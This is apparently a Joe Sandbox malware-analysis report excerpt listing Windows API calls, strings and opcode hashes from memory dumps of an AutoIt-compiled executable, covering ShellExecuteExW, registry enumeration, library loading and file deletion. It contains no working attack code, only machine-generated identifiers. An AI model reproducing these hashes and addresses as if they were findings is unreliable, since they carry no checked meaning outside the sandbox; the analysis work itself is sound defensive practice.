                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 146765662-0
                                                                                                                                        • Opcode ID: f317dbf43fa4ade7afee5deff55db427907c067a7b57900902f42f42c0708692
                                                                                                                                        • Instruction ID: 18661a349d821c2154458370bba0f5efb16930e39b4dad7f043259889c333e30
                                                                                                                                        • Opcode Fuzzy Hash: f317dbf43fa4ade7afee5deff55db427907c067a7b57900902f42f42c0708692
                                                                                                                                        • Instruction Fuzzy Hash: 74E0E576004101BBDB019FA6ED0C90ABF79FF49B22B508321F225A2070CFB29420DF60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B27620: _wcslen.LIBCMT ref: 00B27625
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B8C6EE
                                                                                                                                        • _wcslen.LIBCMT ref: 00B8C735
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B8C79C
                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B8C7CA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1227352736-4108050209
                                                                                                                                        • Opcode ID: 637075c3dccda4db42bba5715591a02ec30d53c58021896db6c5fb142ad2dde1
                                                                                                                                        • Instruction ID: 6616549b2af56accb27a994c3f20b7729be968cbf1807bdf1e3629b799068ba7
                                                                                                                                        • Opcode Fuzzy Hash: 637075c3dccda4db42bba5715591a02ec30d53c58021896db6c5fb142ad2dde1
                                                                                                                                        • Instruction Fuzzy Hash: D051DEB56143019BD715AF28C885A7BBBE8EF49310F040AA9FA95D31B1EB70DD04CB66
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00BAAEA3
                                                                                                                                          • Part of subcall function 00B27620: _wcslen.LIBCMT ref: 00B27625
                                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 00BAAF38
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAAF67
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                        • String ID: <$@
                                                                                                                                        • API String ID: 146682121-1426351568
                                                                                                                                        • Opcode ID: 8896eb73c671f487fdf2a46c6cc547b8538c34eab4c22454d3be5dfc741d297d
                                                                                                                                        • Instruction ID: 6de51c30469224012b570a0488a0dbe48fcf7cc76e5086fcd294e43b4065d671
                                                                                                                                        • Opcode Fuzzy Hash: 8896eb73c671f487fdf2a46c6cc547b8538c34eab4c22454d3be5dfc741d297d
                                                                                                                                        • Instruction Fuzzy Hash: BB718A70A04229DFCB14EF54D494A9EBBF0FF09300F148499E85AAB392CB75ED45CBA1
                                                                                                                                        APIs
                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B87206
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B8723C
                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B8724D
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B872CF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                        • Opcode ID: 9f6bc5e493b6b075146dc48ad79feac79ae5030f8265d6e0f8574114b6657ce3
                                                                                                                                        • Instruction ID: 9fa2a2a2de8ea4defca3af5bd010b8ee1d167f04780f15dba23d078f2dbf758c
                                                                                                                                        • Opcode Fuzzy Hash: 9f6bc5e493b6b075146dc48ad79feac79ae5030f8265d6e0f8574114b6657ce3
                                                                                                                                        • Instruction Fuzzy Hash: E6415F71644204EFDB15DF54C884A9A7FE9EF45318F2480EDBD09AF22ADBB1D944CBA0
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB3E35
                                                                                                                                        • IsMenu.USER32(?), ref: 00BB3E4A
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB3E92
                                                                                                                                        • DrawMenuBar.USER32 ref: 00BB3EA5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 3076010158-4108050209
                                                                                                                                        • Opcode ID: e5c9e97e82004a12de1692f2747e46d87187c0997d0dbf36d93d05520b59ef72
                                                                                                                                        • Instruction ID: 43b09fb74ca9eb31c6856cce2b47db09517b5aae9060df23a77fc00b16066ab4
                                                                                                                                        • Opcode Fuzzy Hash: e5c9e97e82004a12de1692f2747e46d87187c0997d0dbf36d93d05520b59ef72
                                                                                                                                        • Instruction Fuzzy Hash: E4413875A00209EFDB10DF54D884AEABBF5FF48750F0441AAE905AB250D7B0EE45CB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00B83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B83CCA
                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B81E66
                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B81E79
                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00B81EA9
                                                                                                                                          • Part of subcall function 00B26B57: _wcslen.LIBCMT ref: 00B26B6A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 2081771294-1403004172
                                                                                                                                        • Opcode ID: 183615c3d125df47ba34d5ea4f380fc9456c706d7831339a57fd67c15bded480
                                                                                                                                        • Instruction ID: 604d8e7e98fd080eb5423d8b6a151ff9d13bcce1eff8b70216f5512b03b0248b
                                                                                                                                        • Opcode Fuzzy Hash: 183615c3d125df47ba34d5ea4f380fc9456c706d7831339a57fd67c15bded480
                                                                                                                                        • Instruction Fuzzy Hash: F221B471A01104ABDB14AB68EC46CFFBBECDF45354F144599F81AA71F1DB744906D720
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen
                                                                                                                                        • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                                                                        • API String ID: 176396367-4004644295
                                                                                                                                        • Opcode ID: 11d1ef2d414171613252895d70645fd5e3c627a1aa0210f2d807424a61135113
                                                                                                                                        • Instruction ID: 4eafe09c6a7b54282e6d701da59b9fc034bfa29f05669e344da934ff02ab94cc
                                                                                                                                        • Opcode Fuzzy Hash: 11d1ef2d414171613252895d70645fd5e3c627a1aa0210f2d807424a61135113
                                                                                                                                        • Instruction Fuzzy Hash: C1310433A0856E8BCB20DF6DD8405BE3BD1DBA3794B1540E9E845AB25DEB70CE40D3A0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BB2F8D
                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00BB2F94
                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BB2FA9
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00BB2FB1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                                        • Opcode ID: 3f02f0e2843c5d366654f0e4303cd7e583cbc8686ab463542beb6f4522ec156b
                                                                                                                                        • Instruction ID: 865b66be83a609daca56efaa3ab69897e18053ed72febf7dce035ffa7ae12b2b
                                                                                                                                        • Opcode Fuzzy Hash: 3f02f0e2843c5d366654f0e4303cd7e583cbc8686ab463542beb6f4522ec156b
                                                                                                                                        • Instruction Fuzzy Hash: 88216772204209ABEF108FA4DC84EFB77F9EB69364F104668FA50D71A0DBB1DC919760
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B44D1E,00B528E9,?,00B44CBE,00B528E9,00BE88B8,0000000C,00B44E15,00B528E9,00000002), ref: 00B44D8D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B44DA0
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00B44D1E,00B528E9,?,00B44CBE,00B528E9,00BE88B8,0000000C,00B44E15,00B528E9,00000002,00000000), ref: 00B44DC3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                        • Opcode ID: b69730eb5197ee8f498a30fa55d978d16f8b61b9bcc5fd079dc542c6e69ba200
                                                                                                                                        • Instruction ID: a6dced2f9d59029f86b55974d9416757ab17a7a101a06de812e8f6728dcf4082
                                                                                                                                        • Opcode Fuzzy Hash: b69730eb5197ee8f498a30fa55d978d16f8b61b9bcc5fd079dc542c6e69ba200
                                                                                                                                        • Instruction Fuzzy Hash: 6CF04F35A50208BBDB159F94DC49BAEBFF9EF44751F0001A9F909A3260CFB05E50DA90
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B24EDD,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24E9C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B24EAE
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00B24EDD,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24EC0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                                        • Opcode ID: 12f16969b283de44661549aeac498758bba817ec2c6d9ebc383561e3d453e4c8
                                                                                                                                        • Instruction ID: c64832ea107eaca6ca936e2dc4dc6a511fea7fa1abb08d85d1cafe389b72121e
                                                                                                                                        • Opcode Fuzzy Hash: 12f16969b283de44661549aeac498758bba817ec2c6d9ebc383561e3d453e4c8
                                                                                                                                        • Instruction Fuzzy Hash: BDE08635A016325BA2316729BC18B6F69D8EF81F627060295FC08F3210DFE4CD0280A0
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B63CDE,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24E62
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B24E74
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00B63CDE,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24E87
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                                        • Opcode ID: 4e339113e881445fdb47d5a28a950fea94e0aa01c1737b2ef9e31db08c1181f0
                                                                                                                                        • Instruction ID: 3f7c328a5cac7aaa3d7c9af81b9f2a3e37f82070620ec635564b570599f851cc
                                                                                                                                        • Opcode Fuzzy Hash: 4e339113e881445fdb47d5a28a950fea94e0aa01c1737b2ef9e31db08c1181f0
                                                                                                                                        • Instruction Fuzzy Hash: E3D01235502632576A366B297C1CE9F6E98EF85F513060A95F909B7134CFE0CD03C5E0
                                                                                                                                        APIs
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B92C05
                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00B92C87
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B92C9D
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B92CAE
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B92CC0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3226157194-0
                                                                                                                                        • Opcode ID: 4e406c6daa53eec397b75d04a9dbc299699a9eb0d84093a460b98edc83657dc8
                                                                                                                                        • Instruction ID: 970426b94c533159dfce00d7ddc8ba0147d4284a5f52892039ce7db97aed1a2f
                                                                                                                                        • Opcode Fuzzy Hash: 4e406c6daa53eec397b75d04a9dbc299699a9eb0d84093a460b98edc83657dc8
                                                                                                                                        • Instruction Fuzzy Hash: 81B11A72D00129ABDF25DBA4CC85EEEBBFDEF49350F1040E6F609E6151EA709E448B61
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00BAA427
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BAA435
                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BAA468
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BAA63D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3488606520-0
                                                                                                                                        • Opcode ID: e585a4910959059a759080ac261446ca6a4b204e8d5e10290cb506038830f90b
                                                                                                                                        • Instruction ID: 4c71506c51ec0f727a7d163bb66914b5a73029568852d781ea2a80a65525d2e7
                                                                                                                                        • Opcode Fuzzy Hash: e585a4910959059a759080ac261446ca6a4b204e8d5e10290cb506038830f90b
                                                                                                                                        • Instruction Fuzzy Hash: 79A1AF716043009FD720DF28D896F2AB7E5AF88714F14889DF55A9B392DBB0EC45CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B8CF22,?), ref: 00B8DDFD
                                                                                                                                          • Part of subcall function 00B8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B8CF22,?), ref: 00B8DE16
                                                                                                                                          • Part of subcall function 00B8E199: GetFileAttributesW.KERNEL32(?,00B8CF95), ref: 00B8E19A
                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00B8E473
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B8E4AC
                                                                                                                                        • _wcslen.LIBCMT ref: 00B8E5EB
                                                                                                                                        • _wcslen.LIBCMT ref: 00B8E603
                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B8E650
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3183298772-0
                                                                                                                                        • Opcode ID: 092190b5d5411ef6e3553d2329f7ea7c54d63d459c4822a063798421f3947f76
                                                                                                                                        • Instruction ID: 5a04a5c4ce884f6ebf0f2145bb1dbf2f9b6236e881eaf2d3c919a3c9e150ff6f
                                                                                                                                        • Opcode Fuzzy Hash: 092190b5d5411ef6e3553d2329f7ea7c54d63d459c4822a063798421f3947f76
                                                                                                                                        • Instruction Fuzzy Hash: D1515FB24083459BC724EBA4D8819DFB3ECEF84340F04496EF599931A1EF74E688C766
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00BAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAB6AE,?,?), ref: 00BAC9B5
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BAC9F1
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BACA68
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BACA9E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BABAA5
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BABB00
                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BABB63
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00BABBA6
